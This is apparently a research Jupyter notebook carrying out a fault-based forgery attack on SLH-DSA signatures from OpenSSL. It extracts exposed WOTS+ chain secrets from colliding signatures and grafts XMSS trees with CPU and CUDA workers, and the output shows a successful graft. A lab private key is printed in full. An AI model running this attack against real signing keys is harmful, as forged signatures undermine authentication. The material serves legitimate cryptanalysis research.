In [38]:
%load_ext autoreload
%autoreload 2

The autoreload extension is already loaded. To reload it, use:
  %reload_ext autoreload


# Config

In [39]:
hash_method = 'SHA2'
security = '192f'
variant = 'det'

params = f'SLH-DSA-{hash_method}-{security}'

base = f"../../nas-home/SLasH-DSA/results_ossl_SLH-DSA_{variant}_new/"

sk_file = base + f"keys/sk_{params}.key"
pk_file = base + f"keys/pk_{params}.pub"

sigs_file_base = f"sigs/sigs_ossl_" + params + "_" + variant + ".txt"
sigs_file = base + sigs_file_base

sanity_check = True
simulate_faults = False
filter_sigs  = False
use_pickle = False

from timeit import default_timer as timer
full_attack_start = timer()

# Setup

Install dependencies, define some helper functions

In [40]:
%pip install -r requirements.txt
!python --version


[1m[[0m[34;49mnotice[0m[1;39;49m][0m[39;49m A new release of pip is available: [0m[31;49m25.0.1[0m[39;49m -> [0m[32;49m25.3[0m
[1m[[0m[34;49mnotice[0m[1;39;49m][0m[39;49m To update, run: [0m[32;49mpip install --upgrade pip[0m
Note: you may need to restart the kernel to use updated packages.
Python 3.12.11


In [41]:
from fips205 import ADRS, SLH_DSA, WOTSKeyData

slh = SLH_DSA(params)
a = slh.a
d = slh.d
hp = slh.hp
n = slh.n
k = slh.k
lg_w = slh.lg_w
len1 = slh.len1
len2 = slh.len2
w = slh.w
slh

<fips205.SLH_DSA at 0x7fca44137c80>

In [42]:
def pretty_adrs(adrs: ADRS, verbose=False):
    hex = adrs.adrs().hex()
    text = ''
    if verbose:
        text += 'LAYER' + ' ' * 4 + \
              'TREE ADDR' + ' ' * 18 + \
              'TYP' + ' ' * 6 + \
              'KADR' + ' ' * 5 + \
              'PADD = 0\n'
    text += ' '.join([hex[i:i+8] for i in range(0, len(hex), 8)])
    return text
def print_adrs(adrs: ADRS, end='\n', verbose=False):
    print(pretty_adrs(adrs, verbose), end=end)

In [43]:
# Pickling for compute-intensive data

import os

def pickle_load(filename: str, or_else) -> dict:
    if use_pickle:
        import pickle
        if os.path.exists(filename):
            print(f"Loading pickle from {filename}.")
            with open(filename, 'rb') as f:
                return pickle.load(f)
        else:
            print(f"File {filename} not found, creating new one.")
            return pickle_store(filename, or_else)
    else:
        print(f"Pickle loading is disabled, using fallback.")
        return or_else()
    
def pickle_store(filename: str, fn):
    if use_pickle:
        import pickle
        value = fn()
        with open(filename, 'wb') as f:
            pickle.dump(value, f)
        return value
    else:
        print(f"Pickle storing is disabled, not saving {filename}.")
        value = fn()
        return value

In [44]:
from typing import Generator

def shared_intermediates(v1: WOTSKeyData, valid: WOTSKeyData) -> Generator[tuple[int, int], None, bool]:
    if not v1.intermediates or not valid.intermediates:
        print("Not intermediates, skipping.")
        return False
    if v1 == valid:
        print("v1 == valid, skipping.")
        return False
    retval = False
    for chain_idx, chain in enumerate(v1.intermediates):
        if not chain:
            continue
        for hash_iter, step in enumerate(chain[1:], start=1):
            if step == valid.sig[chain_idx*n:(chain_idx+1)*n]:
                retval = True
                yield (chain_idx, hash_iter)
    return retval

def print_arr_w(arr: list[int], width):
    if not arr:
        print('None')
        return
    print('[ ', end='')
    for x in arr:
        print(f"{x:0{width}d}", end=' ')
    print(']')
    
def valid_sigs_d(groups):
    return {adrs: key for adrs, keys in groups.items() for key in keys if key.valid}

def hex(s: bytes | None) -> str:
    return s.hex() if s else "None"

def print_key_data(v: WOTSKeyData, adrs: ADRS, pk_seed: bytes, valid_key: WOTSKeyData | None = None, indent=''):
    # print("Verify:", v.verify(pk_seed, params))
    print(indent + ("Valid" if v.valid else "Invalid" if v.valid == False else "--"), end='\t')
    print(indent + v.sig.hex()[:128] + '...')
    print(indent + '\tPK (from tree)\t' + hex(v.pk))
    pk = v.calculate_pk(params, adrs, pk_seed)
    print(indent + '\tPK (calculated)\t' + hex(pk))
    print(indent + f"\tWOTS key is part of signature {v.sig_idx}")
    print(indent + '\t\t\t', end='')
    print_arr_w([i for i in range(len(v.chains))], 2)
    print(indent + '\t' + "chains\t\t", end='')
    print_arr_w(v.chains, 2)
    print(indent + '\t' + "chains (calc)\t", end = '')
    print_arr_w(v.chains_calculated, 2)
    if valid_key and not v.valid:
        for chain_idx, exposed in shared_intermediates(v, valid_key):
            print(indent + f"\t\tExposed {exposed} secret values at chain_idx {chain_idx}")
    

def print_groups(pk_seed: bytes, groups: dict[ADRS, list[WOTSKeyData]], skip_no_exposed=True):
    #collisions: list[tuple[ADRS, set[WOTSKeyData]]] = [(adrs, value) for adrs, value in collisions if any(v.valid for v in value) and not all(v.valid for v in value)]
    #print(f"Found {len(collisions)} groups with at least one valid and one invalid key")
    # collisions where PK match. This is not necessary. Better: find exposed keys by running WOTS chain
    """collisions = [
        (adrs, value)
        for adrs, value in collisions
        if any(v1.msg != v2.msg and v1.pk == v2.pk for v1 in value for v2 in value if v1.valid and not v2.valid)
    ]"""
    
    valid_sigs = valid_sigs_d(groups)

    # sort by layer address
    groups: list = sorted(groups.items(), key=lambda item: item[0].get_layer_address())
    
    for adrs, value in groups:
        valid_sig = valid_sigs[adrs] if adrs in valid_sigs else None
        invalid_sigs = [v for v in value if not v.valid]
        print_adrs(adrs, end='', verbose=True)
        print(len(value))
        
        for v in [valid_sig] + invalid_sigs:
            if not v:
                continue
            if skip_no_exposed and not v.valid and not shared_intermediates(v, valid_sig):
                continue
            print_key_data(v, adrs, pk_seed, valid_sig, indent='\t')

# Clean Start

Run this cell (and below) for a clean analysis

In [45]:
groups: dict[ADRS, set[WOTSKeyData]] = {}

In [46]:
# Load public key from PEM file
import os

def load_pem(filename):
    with open(filename, "r") as f:
        pem_content = f.read()
    print("PEM content:")
    print(pem_content)

    # Extract the key data from PEM format
    # PEM format typically has header/footer lines and base64 encoded data
    lines = pem_content.strip().split('\n')
    # Find lines between -----BEGIN and -----END
    key_lines = []
    in_key = False
    for line in lines:
        if 'BEGIN' in line:
            in_key = True
            continue
        elif 'END' in line:
            in_key = False
            continue
        elif in_key:
            key_lines.append(line)

    if key_lines:
        import base64
        # Join all base64 lines and decode
        b64_data = ''.join(key_lines)
        print(b64_data)
        try:
            return base64.b64decode(b64_data)
        except Exception as e:
            print(f"Error decoding base64: {e}")
            return None
    else:
        print("No key data found in PEM file")
        return None

In [47]:
pk_der = load_pem(pk_file)
print(f"\nDecoded DER length: {len(pk_der)} bytes")
print(f"DER hex: {pk_der.hex()}")

# Parse DER structure to extract SLH-DSA public key
# Public key DER structure:
# 30 50 - SEQUENCE, length 0x50 (80 bytes)
# 30 0b - SEQUENCE, length 11 (algorithm identifier)
#   06 09 60864801650304031e - OID for SLH-DSA-SHAKE-256s
# 03 41 00 - BIT STRING, length 0x41 (65 bytes), unused bits = 0
# The actual 64-byte public key follows

# Extract the actual SLH-DSA public key (64 bytes at the end)
if len(pk_der) >= slh.n*2:
    # For public keys, the actual key is typically at the end after the DER structure
    pk = pk_der[-slh.n*2:]
    pk_seed = pk[:slh.n]
    pk_root = pk[slh.n:]
    print(f"\nExtracted public key ({2*slh.n} bytes): {pk.hex()}")
    print(f"PK seed ({slh.n} bytes): {pk_seed.hex()}")
    print(f"PK root ({slh.n} bytes): {pk_root.hex()}")
else:
    print("Warning: DER data seems too short for SLH-DSA key")
    pk = pk_der
    pk_seed = pk[:min(slh.n, len(pk))]

PEM content:
-----BEGIN PUBLIC KEY-----
MEAwCwYJYIZIAWUDBAMXAzEAPUZ65i8hH1+2Q1VVXqR3Q/2hatWdnnO9TnDvTdgo
7F7HchN4rPHi0SrXq+6lde0b
-----END PUBLIC KEY-----

MEAwCwYJYIZIAWUDBAMXAzEAPUZ65i8hH1+2Q1VVXqR3Q/2hatWdnnO9TnDvTdgo7F7HchN4rPHi0SrXq+6lde0b

Decoded DER length: 66 bytes
DER hex: 3040300b06096086480165030403170331003d467ae62f211f5fb64355555ea47743fda16ad59d9e73bd4e70ef4dd828ec5ec7721378acf1e2d12ad7abeea575ed1b

Extracted public key (48 bytes): 3d467ae62f211f5fb64355555ea47743fda16ad59d9e73bd4e70ef4dd828ec5ec7721378acf1e2d12ad7abeea575ed1b
PK seed (24 bytes): 3d467ae62f211f5fb64355555ea47743fda16ad59d9e73bd
PK root (24 bytes): 4e70ef4dd828ec5ec7721378acf1e2d12ad7abeea575ed1b


In [48]:
sk_der = load_pem(sk_file)
print(f"\nDecoded DER length: {len(sk_der)} bytes")

PEM content:
-----BEGIN PRIVATE KEY-----
MHICAQAwCwYJYIZIAWUDBAMXBGDCq6YMX9YuLGGVNQNng1x5lyUpRs//6JQNig+R
KqLJr1knJH0f/crqqRZij8rjFzk9RnrmLyEfX7ZDVVVepHdD/aFq1Z2ec71OcO9N
2CjsXsdyE3is8eLRKter7qV17Rs=
-----END PRIVATE KEY-----

MHICAQAwCwYJYIZIAWUDBAMXBGDCq6YMX9YuLGGVNQNng1x5lyUpRs//6JQNig+RKqLJr1knJH0f/crqqRZij8rjFzk9RnrmLyEfX7ZDVVVepHdD/aFq1Z2ec71OcO9N2CjsXsdyE3is8eLRKter7qV17Rs=

Decoded DER length: 116 bytes


In [49]:
def parse_slh_dsa_private_key_der(der_data: bytes, expected_key_size: int):
    """
    Parse SLH-DSA private key from DER format.
    Returns the raw SLH-DSA private key bytes.
    """
    if len(der_data) < 10:
        raise ValueError("DER data too short")
    
    pos = 0
    
    # Parse outer SEQUENCE
    if der_data[pos] != 0x30:
        raise ValueError("Expected SEQUENCE tag")
    pos += 1
    
    # Parse length (can be short or long form)
    length_byte = der_data[pos]
    pos += 1
    
    if length_byte & 0x80:  # Long form
        length_octets = length_byte & 0x7f
        if length_octets > 4:
            raise ValueError("Length too long")
        total_length = 0
        for i in range(length_octets):
            total_length = (total_length << 8) | der_data[pos]
            pos += 1
    else:  # Short form
        total_length = length_byte
    
    # Parse INTEGER (version)
    if der_data[pos] != 0x02:
        raise ValueError("Expected INTEGER tag for version")
    pos += 1
    version_length = der_data[pos]
    pos += 1
    pos += version_length  # Skip version value
    
    # Parse algorithm identifier SEQUENCE
    if der_data[pos] != 0x30:
        raise ValueError("Expected SEQUENCE tag for algorithm identifier")
    pos += 1
    alg_length = der_data[pos]
    pos += 1
    pos += alg_length  # Skip entire algorithm identifier
    
    # Parse OCTET STRING containing the actual key
    if der_data[pos] != 0x04:
        raise ValueError("Expected OCTET STRING tag for private key")
    pos += 1
    
    # Parse OCTET STRING length
    key_length_byte = der_data[pos]
    pos += 1
    
    if key_length_byte & 0x80:  # Long form
        length_octets = key_length_byte & 0x7f
        key_length = 0
        for i in range(length_octets):
            key_length = (key_length << 8) | der_data[pos]
            pos += 1
    else:  # Short form
        key_length = key_length_byte
    
    # Extract the actual key
    if key_length != expected_key_size:
        print(f"Warning: Expected {expected_key_size} bytes, got {key_length} bytes")
    
    if pos + key_length > len(der_data):
        raise ValueError("Not enough data for private key")
    
    return der_data[pos:pos + key_length]

# Use the parser
expected_sk_size = 4 * slh.n  # SLH-DSA private key is always 4*n bytes
sk = parse_slh_dsa_private_key_der(sk_der, expected_sk_size)

print(f"\nExtracted SLH-DSA private key length: {len(sk)} bytes")
print(f"SLH-DSA key hex: {sk.hex()}")

# Rest of your parsing code remains the same
sk_seed = sk[:slh.n]
sk_prf = sk[slh.n:2*slh.n]
pk_seed_from_sk = sk[2*slh.n:3*slh.n]
pk_root_from_sk = sk[3*slh.n:4*slh.n]

print(f"\nSK seed:     {sk_seed.hex()}")
print(f"SK prf:      {sk_prf.hex()}")  
print(f"PK seed:     {pk_seed_from_sk.hex()}")
print(f"PK root:     {pk_root_from_sk.hex()}")

# Verify that the public key components match
if pk_seed_from_sk == pk_seed:
    print("✓ PK seed matches between public and private keys")
else:
    print("✗ PK seed mismatch between public and private keys")
    print(f"  From PK file: {pk_seed.hex()}")
    print(f"  From SK file: {pk_seed_from_sk.hex()}")


Extracted SLH-DSA private key length: 96 bytes
SLH-DSA key hex: c2aba60c5fd62e2c6195350367835c7997252946cfffe8940d8a0f912aa2c9af5927247d1ffdcaeaa916628fcae317393d467ae62f211f5fb64355555ea47743fda16ad59d9e73bd4e70ef4dd828ec5ec7721378acf1e2d12ad7abeea575ed1b

SK seed:     c2aba60c5fd62e2c6195350367835c7997252946cfffe894
SK prf:      0d8a0f912aa2c9af5927247d1ffdcaeaa916628fcae31739
PK seed:     3d467ae62f211f5fb64355555ea47743fda16ad59d9e73bd
PK root:     4e70ef4dd828ec5ec7721378acf1e2d12ad7abeea575ed1b
✓ PK seed matches between public and private keys


# Load real signatures

This loads the real signatures from `sigs_file` (see config)

In [50]:
from cryptanalysis_lib import extract_wots_keys

def load_groups():
    with open(sigs_file, "r") as f:
        sigs = []
        for s in f.readlines():
            try:
                sigs.append(bytes.fromhex(s.strip()))
            except:
                print(s)
        # sigs = sigs[:1000]
    print(f"Processing {len(sigs)} signatures...", end=' ')
    groups = extract_wots_keys(pk, sigs, params)
    return sigs, groups

sigs, groups = pickle_load(sigs_file_base + ".pkl", load_groups)
print(f"Loaded {len(sigs)} signatures in {len(groups)} groups")
total_sigs = sum(len(v) for v in groups.values())
print(f"Total signatures in groups: {total_sigs}")
print(f"valid signatures: {len(set(k.sig_idx for v in groups.values() for k in v if k.valid))}")
print(f"invalid signatures: {len(set(k.sig_idx for v in groups.values() for k in v if not k.valid))}")

Pickle loading is disabled, using fallback.
Processing 51 signatures... 

Loaded 51 signatures in 22 groups
Total signatures in groups: 47
valid signatures: 16
invalid signatures: 1


# Group Collisions

...appear here!

In [51]:
def max_collisions_by_sig_count(groups: dict[ADRS, set[WOTSKeyData]]):
    max_idx = max((key.sig_idx for adrs, keys in groups.items() for key in keys), default=-1)
    if max_idx < 0:
        return
    for idx in range(0, max_idx, 100):
        count = max(len(set(key.sig for key in keys if key.sig_idx < idx)) for keys in groups.values())
        yield (idx, count)

In [52]:
for c in max_collisions_by_sig_count(groups):
    print(f'{c[0]},{c[1]}')

0,0


In [53]:
# maintain a dictionary of valid signatures per adrs
valid_sigs = valid_sigs_d(groups)
print(f"Found {len(valid_sigs)} valid signatures in groups")

Found 22 valid signatures in groups


In [54]:
# only keep collisions
from cryptanalysis_lib import find_collisions


groups = find_collisions(groups)
print(f"Found {len(groups)} groups with collisions")

Found 14 groups with collisions


In [55]:
# post-process collided WOTS keys
def calc_intermediates() -> dict[ADRS, set[WOTSKeyData]]:
    global groups
    for adrs, keys in groups.items():
        if adrs not in valid_sigs:
            continue
        valid_sig = valid_sigs[adrs]
        for key in keys:
            key.calculate_intermediates(params, adrs, pk_seed, valid_sig)
    return groups
        
groups: dict[ADRS, set[WOTSKeyData]] = pickle_load("groups_intermediates_" + sigs_file_base + ".pkl", calc_intermediates)
print(f"Calculated intermediates for {len(groups)} groups")
assert all(s.chains_calculated for _, sigs in groups.items() for s in sigs), "Not all keys have calculated chains"

Pickle loading is disabled, using fallback.
Calculated intermediates for 14 groups


In [56]:
#for adrs, keys in groups.items():
    #print_adrs(adrs, verbose=True)
    #for key in keys:
    #    print_key_data(key, adrs, pk_seed, None)
    #    print('Intermediates:', key.intermediates)

In [57]:
# filter out signatures containing no WOTS secrets
groups = {adrs: [sig for sig in sigs if any(i < 17 for i in sig.chains_calculated)] for adrs, sigs in groups.items()}
groups = find_collisions(groups)
print(f"Found {len(groups)} groups with at least one WOTS secret")

Found 14 groups with at least one WOTS secret


In [58]:
def filter_signatures(sigs: list[bytes], wots_keys: dict[ADRS, set[WOTSKeyData]]) -> set[bytes]:
    filtered_sigs = set()
    collisions = find_collisions(wots_keys)
    collisions = {adrs: sigs for adrs, sigs in collisions.items() if any(sig.valid for sig in sigs) and len(sigs) > 1}
    valid_sigs = valid_sigs_d(wots_keys)
    for adrs, keys in collisions.items():
        for key in keys:
            if key.valid:
                # keep valid keys
                filtered_sigs.add(sigs[key.sig_idx])
            if adrs in valid_sigs and shared_intermediates(key, valid_sigs[adrs]):
                filtered_sigs.add(sigs[key.sig_idx])
    return filtered_sigs

if filter_sigs:
    # only keep signatures that are valid or have exposed WOTS keys
    filtered_sigs = filter_signatures(sigs, groups)
    print(f"Kept {len(filtered_sigs)} of {len(sigs)} signatures")
    with open("../sigs_filtered.txt", "w") as f:
        for sig in filtered_sigs:
            f.write(sig.hex() + "\n")

# Combine WOTS Keys
This section combines the collided keys

In [59]:
# filter groups with exposed WOTS secrets
groups: dict[ADRS, set[WOTSKeyData]] = {adrs: sigs 
    for adrs, sigs in groups.items()
    if any(shared_intermediates(sig, valid_sigs[adrs]) for sig in sigs)
}
print(f"Found {len(groups)} groups with exposed WOTS secrets")
#print_groups(pk_seed, groups)

Found 14 groups with exposed WOTS secrets


In [60]:
# Join WOTS keys to get a WOTS key usable for signing as many messages as possible
from copy import deepcopy

def join_sigs(wots_keys: dict[ADRS, set[WOTSKeyData]], params, pk_seed) -> dict[ADRS, WOTSKeyData]:
    joined_sigs = {}
    valid_sigs = valid_sigs_d(wots_keys)
    for adrs, keys in wots_keys.items():
        if len(keys) < 2:
            continue
        retval = deepcopy(valid_sigs[adrs])
        if not retval.chains_calculated:
            print_adrs(adrs)
            retval.calculate_intermediates(params, adrs, pk_seed, valid_sigs[adrs])
        for key in keys:
            retval = retval.join(key, pk_seed, params)
        joined_sigs[adrs] = retval
    return joined_sigs

joined_sigs = join_sigs(groups, params, pk_seed)
print(f"Joined {len(joined_sigs)} signatures")
# Filter out signatures with all chains set to 0
#joined_sigs = {adrs: key for adrs, key in joined_sigs.items() if any(c > 0 for c in key.chains_calculated)}
#print(f"Filtered {len(joined_sigs)} (wildcard chains)")

chain 46 mismatch between None and 25, skipping
Joined 14 signatures


In [61]:

scores = {}

def score(key):
    from cryptanalysis_worker import signable_messages

    if key not in scores:
        msg_chains = key.chains_calculated[:slh.len1]
        cksum_chains = key.chains_calculated[slh.len1:]
        signable = signable_messages(msg_chains, cksum_chains, w, len1, len2)
        signable = sum(i for (_, i) in signable)
        scores[key] = signable
    return scores[key]

In [62]:
# we only attack XMSS layers for now, didn't implement FORS grafting
joined_sigs = {adrs: key for adrs, key in joined_sigs.items() if adrs.get_layer_address() > 0}

In [63]:
import math

for adrs, key in sorted(joined_sigs.items(), key=lambda item: score(item[1]), reverse=True):
    print_adrs(adrs, verbose=True)
    print("Score: ", math.log2(w**len1)-math.log2(score(key)))
    print("Verifiable:", key.verify(pk_seed, params))
    print_key_data(key, adrs, pk_seed, None)

    print("=" * 64)
    print("All keys for exposed address:")
    for key in groups[adrs]:
        print("Verifiable:", key.verify(pk_seed, params))
        print_key_data(key, adrs, pk_seed, valid_sigs[adrs])


LAYER    TREE ADDR                  TYP      KADR     PADD = 0
00000013 00000000 00000000 00000011 00000001 00000007 00000000 00000000
Score:  22.15264326997348
Verifiable: False
--	992f34ffa7c9510fce9b5b1514ebd0285b088f9d5b7a80a7b1120602d1b64c827a8ae70099aa75b6aa7be92b0139c4c5b40ebd29078a5be9edd6188537de4967...
	PK (from tree)	5a616f07fa9ad5f0075a3b699b99b5b1b92f0b67c2f7e3fa
	PK (calculated)	5a616f07fa9ad5f0075a3b699b99b5b1b92f0b67c2f7e3fa
	WOTS key is part of signature None
			[ 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 ]
	chains		[ 02 01 02 13 06 11 04 02 02 00 00 03 04 00 04 00 01 03 06 05 01 01 07 05 11 00 05 05 06 05 00 06 00 04 03 07 04 01 05 00 01 00 13 00 10 00 00 01 01 06 02 ]
	chains (calc)	[ 02 01 02 13 06 11 04 02 02 00 00 03 04 00 04 00 01 03 06 05 01 01 07 05 11 00 05 05 06 05 00 06 00 04 03 07 04 01 05 00 01 00 13 00 10 00 00 01 01 06 02 ]
All keys for exposed 

In [64]:
# calculate number of signable messages (without checksum)
import math

tmp = [(a, k) for a, k in joined_sigs.items()]
num_signable = [score(k) for _, k in tmp]
expected_reps = [(w**len1)/n for n in num_signable]

# take the best key in the set
most_exposed_adrs, most_exposed_key = tmp[num_signable.index(max(num_signable))] if num_signable else (None, None)
expected_reps_best = min(expected_reps) if expected_reps else None

print('Expected Repetitions:', [math.log2(r) for r in expected_reps])
print('Average:', math.log2(sum(expected_reps)/len(expected_reps)) if expected_reps else 0)

Expected Repetitions: [32.61943868473964, 34.18240213685148, 34.10375625096235, 24.119309348213562, 37.46120735064355, 32.16908358340576, 40.00854903312986, 38.368905495998774, 63.29619950667759, 34.0894752537931, 22.152643269973478, 37.698022809241934, 40.11385824770883]
Average: 59.59576018733946


# Tree Grafting

It gets costly from here on. Tread lightly

In [65]:
# Determine best key candidate by combined comp;exity
def genet_complexity(M, l):
    return 1/math.exp(-l/(M+1))
def path_seeking_hashes(h, hp, layer):
	"""Fix the tree index (tau), fix the leaf index (lambda) in this tree.

	We want both the tree index and the leaf index to pass by the compromised
	key pair. Given the layer l at which the key pair is compromised, we need
	the h-hp*(l+1) first bits of the digest's address to be tau, then the
	subsequent hp bits to be lambda. As a result, this amounts to:

	    2^(h-hp*(layer+1))*2^hp = 2^(h-hp*layer) possible solutions.

	On average, we need to perform this amount of hashes to get it right
	(see: geometric random variable).
	"""
	return 2**(h - hp*layer)

In [66]:

print(params + "_" + variant)
print("Total Sigs for Instance,Number of Collisions,Exact Solution,Genet")
for (adrs, key) in joined_sigs.items():
    # find number of collisions for instance
    M = 0
    for other in groups[adrs]:
        if shared_intermediates(other, key):
            M += 1
    l = slh.len
    print(len(groups[adrs]),M, f'{math.log2((w**len1)/score(key)):.02f}', f'{math.log2(genet_complexity(M, l)):.02f}', sep=',')
def hashes_per_graft(hp, len):
    return 2**hp*(len*w+1)+1+2**(hp-1)
best = None
best_score = 2**256
for adrs, key in joined_sigs.items():
    grafting_complexity = (slh.w**slh.len1)/score(key)*hashes_per_graft(slh.hp, slh.len)
    seeking_complexity = path_seeking_hashes(slh.h, slh.hp, adrs.get_layer_address())
    total_complexity = grafting_complexity + seeking_complexity
    #print(f'${adrs.get_layer_address()}$ & $2^{{{math.log2(grafting_complexity):.02f}}}$ & $2^{{{math.log2(seeking_complexity):.00f}}}$')
    if total_complexity < best_score:
        best_score = total_complexity
        best = (adrs, key, grafting_complexity, seeking_complexity)
if best:
    most_exposed_adrs, most_exposed_key, grafting_complexity, seeking_complexity = best
best

SLH-DSA-SHA2-192f_det
Total Sigs for Instance,Number of Collisions,Exact Solution,Genet
2,2,32.62,24.53
2,2,34.18,24.53
3,3,34.10,18.39
4,4,24.12,14.72
3,3,37.46,18.39
2,2,32.17,24.53
3,3,40.01,18.39
2,2,38.37,24.53
2,2,63.30,24.53
3,3,34.09,18.39
3,3,22.15,18.39
3,3,37.70,18.39
2,2,40.11,24.53


(0000001300000000000000000000001100000001000000070000000000000000,
 WOTSKeyData at ADRS 0000001300000000000000000000001100000001000000070000000000000000 with PK 5a616f07fa9ad5f0075a3b699b99b5b1b92f0b67c2f7e3fa,
 30496798946.97197,
 512)

In [67]:
import cryptanalysis_lib as clib
import math
from multiprocessing import Pool, Manager
from os import cpu_count
from timeit import default_timer as timer

import concurrent

def parallel_take_first(fn, work):
    with Manager() as manager:
        stop_event = manager.Event()
        with concurrent.futures.ProcessPoolExecutor() as executor:
            # Build one work item per (process x key)
            # create an event to shut down all running tasks
            work = [(*work, stop_event) for work in work]
            futures = [executor.submit(fn, work) for work in work]
            try:
                # Use wait with FIRST_COMPLETED to get the first result immediately
                while futures:
                    done, not_done = concurrent.futures.wait(futures, return_when=concurrent.futures.FIRST_COMPLETED)
                    
                    for future in done:
                        try:
                            result = future.result()
                            print("Returned from the future with result:", result)
                            if result:
                                stop_event.set()
                                for f in not_done:
                                    f.cancel()
                                return result
                        except Exception as e:
                            print("Error:", e)
                    # Remove completed futures and continue with remaining ones
                    futures = list(not_done)
            finally:
                # Ensure all futures are cancelled if we exit early
                for f in futures:
                    if not f.done():
                        f.cancel()

def graft(total_msgs, adrs, key, pk_seed, params, num_procs: int = 0):
    """
    Use a process pool to sign `total_msgs` messages *per* (adrs,key).
    Returns the first successful message signed by any process.
    """
    if num_procs == 0:
        num_procs = cpu_count() or 1

    # Split total_msgs into roughly equal chunks per process
    per_proc = math.ceil(total_msgs / num_procs)
    print("Total messages per process:", per_proc)
    work = [(idx, per_proc, adrs.copy(), key, pk_seed, params) for idx in range(num_procs)]
    return parallel_take_first(clib.sign_worker_xmss, work)

def cuda_graft(total_msgs, adrs, key, pk_seed, params):
    from cuda_xmss_library import CUDAXMSSLibrary
    import random
    cuda = CUDAXMSSLibrary("cuspx/libxmss_worker.so")
    slh = SLH_DSA(params)
    rng = random.Random()
    batch_size = 2**21
    num_batches = math.ceil(total_msgs/batch_size)
    layer_addr = key.adrs.get_layer_address()-1
    hp_m    = ((1 << slh.hp) - 1)
    tree_addr = key.adrs.get_tree_address()<<slh.hp | key.adrs.get_key_pair_address() & hp_m
    x_adrs = ADRS()
    x_adrs.set_type_and_clear(ADRS.TREE)
    x_adrs.set_layer_address(layer_addr)
    x_adrs.set_tree_address(tree_addr)
    tree = cuda.generate_tree_with_seeds(b'0' * slh.n, pk_seed, layer_addr, tree_addr)
    assert slh.xmss_node(tree.sk_seed, 0, slh.hp, pk_seed, x_adrs.copy())

    print(f"Grafting XMSS trees in 2^{math.log2(num_batches):.02f} batches")
    for _ in range(num_batches):
        master_seed = rng.randbytes(slh.n)
        print(f"Starting batch...")
        cuda_start = timer()
        tree = cuda.generate_trees_with_seeds(master_seed, pk_seed, batch_size, layer_addr, tree_addr, lower_bounds=key.chains_calculated)
        cuda_duration = timer() - cuda_start
        print(f"CUDA call took {cuda_duration} seconds")
        if tree:
            assert key.try_sign(tree.tree_root, pk_seed, params)
            # print(f"Signed XMSS tree from seed {sk_seed.hex()} and x_adrs {x_adrs} with key {key}")    x_adrs: ADRS = adrs.copy()
            x_adrs: ADRS = adrs.copy()
            x_adrs.set_type_and_clear(ADRS.TREE)
            x_adrs.set_layer_address(layer_addr)
            x_adrs.set_tree_address(tree_addr)
            return (tree.tree_root, x_adrs, tree.sk_seed, key)
        else:
            print("No tree found, continue with next batch")
    return None

In [None]:
ret = None
if most_exposed_adrs:

    print(most_exposed_adrs.get_layer_address())

    print(f"Expected grafting complexity 2^{math.log2(grafting_complexity)}")
    if grafting_complexity > 2**36:
        print("Skipping forgery attack, complexity too high.")
    else:
        #raise ValueError(f"Expected repetitions 2^{math.log2(expected_reps_best)} are too high, aborting")
        success_p = 0.999999999999
        num_sigs = math.ceil(math.log(1-success_p)/math.log(1-(1/expected_reps_best)))

        print(f"Signing 2^{math.log2(num_sigs)} messages")

        ret = graft(num_sigs, most_exposed_adrs, most_exposed_key, pk_seed, params)
        if not ret:
            print("No valid signature found")
ret

19
Expected grafting complexity 2^34.827938769067536
Signing 2^26.94086124979064 messages
Total messages per process: 8051696


In [None]:
xmss_adrs = None
if ret:
    # Collect data from thread, test WOTS signing
    xmss_pk, xmss_adrs, sk_grafted, key = ret
    print("Successfully grafted tree for XMSS PK " + xmss_pk.hex())
    print("XMSS Address")
    print_adrs(xmss_adrs, verbose=True)
    print("Grafted SK seed:", sk_grafted.hex())
    print("Key:", key)
    print("WOTS+ PK:", key.pk.hex())
    print("Original WOTS+ sig:", key.sig.hex())
    print("WOTS+ verify:", key.verify(pk_seed, params))
    sig = key.try_sign(xmss_pk, pk_seed, params)
    print("WOTS+ signature", sig.hex())
    vfy_adrs = key.adrs.copy()
    vfy_adrs.set_type_and_clear(ADRS.WOTS_HASH)
    vfy_adrs.set_key_pair_address(key.adrs.get_key_pair_address())
    print("WOTS address")
    print_adrs(vfy_adrs, verbose=True)
    print("XMSS address")
    print_adrs(xmss_adrs)
    print("Verified:", slh.wots_pk_from_sig(sig, xmss_pk, pk_seed, vfy_adrs) == key.pk)
xmss_adrs

Successfully grafted tree for XMSS PK 7bdc848b8ec9b78516f4ea6e4978cbfd
XMSS Address
LAYER    TREE ADDR                  TYP      KADR     PADD = 0
00000012 00000000 00000000 000001e5 00000002 00000000 00000000 00000000
Grafted SK seed: 09426c1d8b004d569a81536de18d98e8
Key: WOTSKeyData at ADRS 0000001300000000000000000000003c00000001000000050000000000000000 with PK b4533d60096cec11e3a10ae49d592c27
WOTS+ PK: b4533d60096cec11e3a10ae49d592c27
Original WOTS+ sig: afad36792019d23ee3d90dfb7b1e7946edab1b073ca6de36ce09fe9a9466eb8dc8ed666576560a2c275d3c7fcccd0d545d3c65354e49f7f518d5011df8638cdda39dcd535b2497945cbf5081f8dc67f301c5d0c186d97b456ecac21ecb17616ab1d6dc5f82f8fafe60892719f011c05f92c1c07ede394075fd5b2ee9ce70b6d2c3bb66a3c6f9098fd400a48c8e93a0c758a29c4fd510502936cc7ca4d2608af37b5a0efb1337f8b0d7dbe1e5f86858a4291691d7d2119b04b4ab672d64bb0973f8fb0346fb4742c886ed370f2272640f9511f6d857c1986d8b20bc42803d0531447de5e47f037cd88f07c6c02bc5f5e77e4d792a818568b4ae3adaed18fd76449f4bbb852a4437320480c603d

000000120000000000000000000001e500000002000000000000000000000000

In [None]:
wots_bytes = slh.len * n
xmss_bytes = hp * n
fors_bytes = k * (n + a * n)
sig_len = n + fors_bytes + d * (wots_bytes + xmss_bytes)

In [None]:
if most_exposed_adrs:
    #sk_prf = os.urandom(slh.n)
    #_, sk = slh.slh_keygen_internal(sk_seed, sk_prf, pk_seed, params)
    valid_sig = next(key for key in groups[most_exposed_adrs] if key.valid)

    valid_sig = sigs[valid_sig.sig_idx]
    m = valid_sig[sig_len:]
    valid_sig = valid_sig[:sig_len]

    print(f'verifying message "{m.decode()}" with valid signature')
    ctx = b'SLH-DSA test context'
    suc = slh.slh_verify(m, valid_sig, ctx, pk, params)
    print("Signature verification result:", suc)

verifying message "This is a fixed message." with valid signature
Signature verification result: True


# Forge

Perform the forgery based on the grafted tree

In [None]:
import random


